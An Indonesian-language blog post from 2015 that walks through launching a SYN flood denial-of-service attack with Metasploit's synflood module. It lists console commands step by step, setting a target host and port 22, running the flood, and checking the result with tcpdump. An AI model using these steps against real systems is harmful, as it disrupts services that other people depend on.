Jumat, 30 Januari 2015

Metasploit Flooding

Hi all, hari ini mau tulis tentang flood syn menggunakan metasploit. Di tulisan ini, saya anggap metasploit sudah terinstall. Sedikit info tentang flooding, yakni membuat pc target itu menerima syn terus menerus sehingga mengganggu proses transaksi atau request response yang lain di port tersebut.
Berikut step - step flood menggunakan metasploit
1. Cari modul flood
    search flooding
2. Setelah ketemu, gunakan yang synflood
    use auxiliary/dos/tcp/synflood
 3. Lihat parameter pada modul tersebut
     show options

4. Set RHOST (target host) & RPORT (target port)
    set RHOST 192.168.9.22 (contohnya ip yang akan kita flood)
    set RPORT 22 (contohnya port 22, yang kita ingin flood)
    set TIMEOUT 1
5. Lalu kita lihat lagi parameter di modul tersebut
    show options
 6. Kemudian kita run
     run
7. Lalu kita cek pada ip target, menggunakan tcpdump, ngrep atau tools lain, maka akan terlihat banyak syn yang masuk. Hal ini karna, setiap satu detik pc yang ada metasploit itu melempar syn tanpa menunggu syn+ack dari komputer target

Kira - kira seperti cara kerja. Jika kurang jelas bisa lihat di forum metasploit.
Sekian terima kasih.

0 komentar:

Posting Komentar